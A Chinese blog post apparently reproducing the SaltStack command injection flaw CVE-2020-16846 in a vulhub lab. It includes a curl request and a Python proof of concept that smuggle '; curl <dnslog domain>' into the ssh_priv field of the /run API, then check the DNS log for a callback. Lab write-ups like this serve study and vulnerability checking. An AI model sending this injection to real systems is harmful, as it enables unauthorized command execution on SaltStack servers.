SaltStack 命令注入漏洞(CVE-2020-16846)复现,python编写POC

环境搭建:

使用vulhub,进入对应文件夹启动环境:


[root@localhost ~]# cd /home/vulhub/saltstack/CVE-2020-16846/
[root@localhost CVE-2020-16846]# docker-compose up -d

查看端口:


[root@localhost CVE-2020-16846]# docker ps
CONTAINER ID   IMAGE                   COMMAND                  CREATED         STATUS         PORTS                                                                                                                                             NAMES
0043f4957bd6   vulhub/saltstack:3002   "/usr/bin/dumb-init …"   6 seconds ago   Up 5 seconds   0.0.0.0:4505-4506->4505-4506/tcp, :::4505-4506->4505-4506/tcp, 0.0.0.0:8000->8000/tcp, :::8000->8000/tcp, 0.0.0.0:2222->22/tcp, :::2222->22/tcp   cve-2020-16846_saltstack_1
[root@localhost CVE-2020-16846]# 

漏洞复现:

使用KALI向https://your-ip:8000/run发送如下数据包:

┌──(root💀kali)-[~]
└─# curl -v -sk -X POST https://192.168.10.10:8000/run \
-H 'Content-Type: application/json' \
-d '{"client":"ssh","tgt":"*","fun":"anything","eauth":"anything","ssh_priv":"/dev/null < /dev/null; curl erqqbd.dnslog.cn #"}'

在这里插入图片描述

POC编写:

import requests,random,time
requests.packages.urllib3.disable_warnings() #去除告警


url = "https://192.168.10.10:8000/run"
session = requests.session()
dnslog = session.get(f"http://www.dnslog.cn/getdomain.php?t={str(random.random())}").text  # 获取一个子域名

headers = {
    'Content-Type': 'application/json',
}
data = '{"client":"ssh","tgt":"*","fun":"anything","eauth":"anything","ssh_priv":"/dev/null < /dev/null; curl %s #"}'%dnslog

requests.post(url, headers=headers, data=data, verify=False)
time.sleep(2)

dnslog_res = session.get(f"http://www.dnslog.cn/getrecords.php?t={str(random.random())}").text # 获取这个子域名被请求的结果
if dnslog in dnslog_res:
    print("CVE-2020-16846  存在")

pycharm运行结果:在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值